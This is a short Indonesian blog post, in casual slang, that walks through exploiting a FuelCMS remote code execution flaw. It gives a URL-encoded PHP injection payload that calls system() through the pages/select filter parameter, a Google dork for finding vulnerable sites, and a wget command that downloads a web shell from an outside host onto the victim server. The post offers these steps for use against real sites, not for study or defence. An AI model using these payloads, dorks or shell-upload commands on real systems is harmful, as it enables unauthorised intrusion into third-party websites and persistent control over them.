FuelCMS Remote Code Execution



- Ref : https://www.exploit-db.com/exploits/47138
- Payload : /fuel/pages/select/?filter=%27%2bpi%28print%28%24a%3d%27system%27%29%29%2b%24a%28%27COMMAD%27%29%2b%27
- Dork : intext:"FUEL CMS is developed with love by Daylight Studio"
- ngedork dolo gaes :v
- anggap saja w dah dpt 1 site vuln -v
- simak ea
- masukib payload
- http://site.com/PAYLOAD INGAT COMMAND DI PAYLOAD GANTI MISAL  ( ls -la )
- Tara keluar file ma dir listing :v up shell???
Wget url.com/shell.txt -O a.php
Aksesnya di sitr.com/a.php

-RINTOD
maaf kurang jelas :v di hp ribet anying :v

0 Response to "FuelCMS Remote Code Execution"

Post a Comment

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel